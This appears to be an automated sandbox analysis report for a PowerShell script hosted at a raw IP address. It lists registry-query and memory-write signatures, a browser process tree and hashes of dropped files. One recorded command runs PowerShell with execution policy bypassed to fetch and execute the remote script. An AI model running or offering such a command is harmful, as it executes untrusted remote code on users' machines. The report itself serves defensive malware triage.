Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
18-07-2023 14:30
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://94.75.236.122/updates/kdb/i386/diffs/emusc008.kdc.ps1
Resource
win10v2004-20230703-en
General
-
Target
http://94.75.236.122/updates/kdb/i386/diffs/emusc008.kdc.ps1
Malware Config
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1084 powershell.exe 2336 msedge.exe 2336 msedge.exe 1144 msedge.exe 1144 msedge.exe 2632 identity_helper.exe 2632 identity_helper.exe 1904 msedge.exe 1904 msedge.exe 1904 msedge.exe 1904 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1084 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe 1144 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1144 wrote to memory of 1780 1144 msedge.exe 96 PID 1144 wrote to memory of 1780 1144 msedge.exe 96 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 3664 1144 msedge.exe 97 PID 1144 wrote to memory of 2336 1144 msedge.exe 98 PID 1144 wrote to memory of 2336 1144 msedge.exe 98 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99 PID 1144 wrote to memory of 2032 1144 msedge.exe 99
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File http://94.75.236.122/updates/kdb/i386/diffs/emusc008.kdc.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x104,0x128,0x7ff864ae46f8,0x7ff864ae4708,0x7ff864ae47182⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:22⤵PID:3664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 /prefetch:82⤵PID:2032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:12⤵PID:3732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:12⤵PID:1964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:12⤵PID:3804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:12⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3720 /prefetch:82⤵PID:2964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3720 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:12⤵PID:2884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:12⤵PID:1260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:12⤵PID:1168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,12384592542907949899,9833368598248332038,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1384 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1904
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:916
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1556
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD58411007bafe7b1182af1ad3a1809b4f8
SHA14a78ee0762aadd53accae8bb211b8b18dc602070
SHA2561f274d0d144942d00e43fb94f9c27fc91c68dce50cd374ac6be4472b08215ca3
SHA512909e2e33b7614cb8bbd14e0dfff1b7f98f4abbf735f88292546ce3bfa665e4cb5ee4418561004e56afc5dd30d21483b05f6358dad5624c0dc3ab1ba9a3be18eb
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
180B
MD500a455d9d155394bfb4b52258c97c5e5
SHA12761d0c955353e1982a588a3df78f2744cfaa9df
SHA25645a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA5129553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f
-
Filesize
5KB
MD5d9a3435876a040de3bb8e2cc8c266271
SHA110e4b0e80622e2032e24b34af5e3d75dee3cbb2b
SHA25612a9015ad01fb020905780c7fa480a1835357c907d34dadfd887e8f43319eb05
SHA5125b650a5fba45fb4f7158279eccf3c19330c2052ea33315623fd77ab7a32d15364987ef893cfe07ab33ae2a76e025d4a5b6d6ae1656fdf0b8e4555ba9545d9a2c
-
Filesize
5KB
MD5a805c610531c1d69f6cb6b39513a0706
SHA194b6e992f6b329c3b87de753b3fc048e41d3500a
SHA256db86d0462b2ec32054c9a98419518083954041719d1cd2147d1e86e7b293c214
SHA512d0b78c64eb28e0b125e44f0d340433d4918d23d76c5d5a427e1b7803d4a75a19c4bbaa857e72d66970fed5b30570cfe1cc1d69d4f0f153f411fb20d723e40d5a
-
Filesize
5KB
MD5e95f199bd0b180a375d87d9185d3d6d2
SHA1315e092a8269368ae487336640d9afce9be81e03
SHA256f8f463dc64f05a487d9f9c2a7f391f3d31ed61d1594617e9bc26b369ba2ffbeb
SHA512afe63df89dcb54c5ea968ae5d7407dd2638082a970bc0a191a79dbd2156c10a1cda1f1629753506338ee273aef5a25231e1e5e0c4b10333d631ceb156e199a0c
-
Filesize
24KB
MD58caf4d73cc5a7d5e3fb3f9f1a9d4a0cc
SHA183f8586805286b716c70ddd14a2b7ec6a4d9d0fe
SHA2560e0c905b688340512e84db6cf8af6dbdfe29195fefde15bd02e4917a2c5fda8c
SHA512084ef25ea21ee1083735c61b758281ba84b607e42d0186c35c3700b24a176ada47bf2e76ed7dadd3846f2b458c977e83835ced01cda47cdd7ab2d00e5a1a294e
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
12KB
MD53051981a25fbe66dd906906c676893a9
SHA16809d9d9720d44ac4c6659adfbbb70e440753e9a
SHA256aa741e97d41d7fb415e87855d8698999849f8f23b700fb5d2e238cec25f07d73
SHA51219954007c899607be5561e89d1e0aa3cdc9b33558724056c1901d23e9bb59bb4755acdb4bf1c74a9790ca32a6036a5cb690a6c0b4e3f8cf073bbcc0d81e93172
-
Filesize
12KB
MD5d8cab229c8d52115d2ad64dc2cee0259
SHA1a2ed68434a46cf196c769194c902cebe27e6ea20
SHA256cff8e4efed425e9939e924c9c1718f233960d179af035751336b769981e72140
SHA5124624c42e1a4bc715f4fc26ece723389a4e040817ffe48e61393440e23bbcdc35ccd414a6b11cf066b29b59e058c89fb249d466ceffb1da2ec33dbfa6652efab5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82